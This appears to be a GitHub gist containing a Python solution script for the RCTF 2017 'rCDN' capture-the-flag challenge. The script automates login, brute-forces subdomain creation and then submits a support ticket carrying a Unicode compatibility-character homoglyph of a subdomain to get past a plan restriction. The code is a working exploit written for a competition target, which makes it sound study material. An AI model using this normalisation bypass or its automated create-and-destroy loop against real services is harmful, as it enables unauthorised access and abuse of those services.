RCTF 2017 - rCDN Solution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# coding: utf-8 | |
""" | |
Unfortunately solved 20 minutes after the end of the CTF :( | |
""" | |
import re | |
import sys | |
import string | |
import requests | |
import itertools | |
target = 'http://rcdn.2017.teamrois.cn/' | |
username = 'XXXXXXXXXX' | |
password = 'XXXXXXXXXX' | |
url_login = target + 'signin' | |
url_dashboard = target + 'dashboard' | |
url_create_domain = target + 'dashboard/basic/new' | |
url_destroy_domain = target + 'dashboard/basic/destroy/{}' | |
url_tickets = target + 'support/ticket' | |
url_create_ticket = target + 'support/ticket/new' | |
proxies = {'http':'127.0.0.1:8080'} | |
def get_csrfmiddlewaretoken(url): | |
resp = sess.get(url) | |
csrfmiddlewaretoken = re.search('value=\'([a-zA-Z0-9]{64})\'', resp.content) | |
csrfmiddlewaretoken = csrfmiddlewaretoken.group(1) | |
return csrfmiddlewaretoken | |
def login(): | |
print '[*] logging in...' | |
csrfmiddlewaretoken = get_csrfmiddlewaretoken(url_login) | |
data = { | |
'csrfmiddlewaretoken': csrfmiddlewaretoken, | |
'username': username, | |
'password': password | |
} | |
resp = sess.post(url_login, data=data, proxies=proxies) | |
return 'Sign out' in resp.content | |
def create_domain(): | |
print '[*] creating subdomain' | |
resp = sess.get(url_create_domain, proxies=proxies) | |
messages = sess.cookies['messages'] | |
fail_msg = 'You have exceeded maximum number of Basic CDN service' | |
if fail_msg in messages: return False | |
subdomain = re.search('\\\\([a-zA-Z0-9]{8})\\\\', messages) | |
subdomain = subdomain.group(1) | |
return subdomain | |
def destroy_domain(subdomain): | |
print '[*] destroying subdomain: ' + subdomain | |
resp = sess.get(url_destroy_domain.format(subdomain), proxies=proxies) | |
return sess.cookies['messages'] | |
def create_ticket(subdomain): | |
print '[*] creating ticket for subdomain: ' + subdomain | |
csrfmiddlewaretoken = get_csrfmiddlewaretoken(url_create_ticket) | |
data = { | |
'csrfmiddlewaretoken': csrfmiddlewaretoken, | |
'subject': subdomain, | |
'subdomain': subdomain, | |
'message': subdomain, | |
} | |
resp = sess.post(url_create_ticket, data=data, proxies=proxies) | |
fail_msg = 'Only email support is available for Basic CDN Service.' | |
if resp.status_code == 200 and fail_msg in resp.content: | |
return fail_msg | |
return sess.cookies['messages'] | |
global sess | |
sess = requests.session() | |
login = login() | |
if not login: | |
print '[-] failed to login' | |
sys.exit(0) | |
""" | |
required = [ 'hv', 'mv', 'sd', 'ss', 'ppv', 'wc', 'mc', 'md', 'dj', 'cd', 'wz', 'hg', 'erg', 'ev', 'ltd', 'hpa', 'da', 'au', 'bar', 'ov', 'pc', 'dm', 'dm2', 'dm3', 'iu', 'pa', 'na', 'ma', 'ka', 'kb', 'mb', 'gb', 'cal', 'kcal', 'pf', 'nf', 'mg', 'kg', 'hz', 'khz', 'mhz', 'ghz', 'thz', 'ml', 'dl', 'kl', 'fm', 'nm', 'mm', 'cm', 'km', 'mm2', 'cm2', 'm2', 'km2', 'mm3', 'cm3', 'm3', 'km3', 'pa', 'kpa', 'mpa', 'gpa', 'rad', 'ps', 'ns', 'ms', 'pv', 'nv', 'mv', 'kv', 'mv', 'pw', 'nw', 'mw', 'kw', 'mw', 'bq', 'cc', 'cd', 'db', 'gy', 'ha', 'hp', 'in', 'kk', 'km', 'kt', 'lm', 'ln', 'log', 'lx', 'mb', 'mil', 'mol', 'ph', 'ppm', 'pr', 'sr', 'sv', 'wb', 'gal', 'ff', 'fi', 'fl', 'ffi', 'ffl', 'st', 'st', 'no', 'sm', 'tel', 'tm', 'fax' ] | |
while True: | |
subdomain = create_domain() | |
matches = [x for x in required if x in subdomain] | |
if len(matches) >= 2: | |
print '[+] Subdomain: ' + subdomain | |
break | |
else: | |
destroy_domain(subdomain) | |
# Found domain: 'ghzlnmdg' | |
""" | |
t = '\xe3\x8e\x93'.decode('utf-8') + 'l' + '\xe3\x8e\x9a'.decode('utf-8') + 'dg' | |
print '[*] ' + create_ticket(t) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment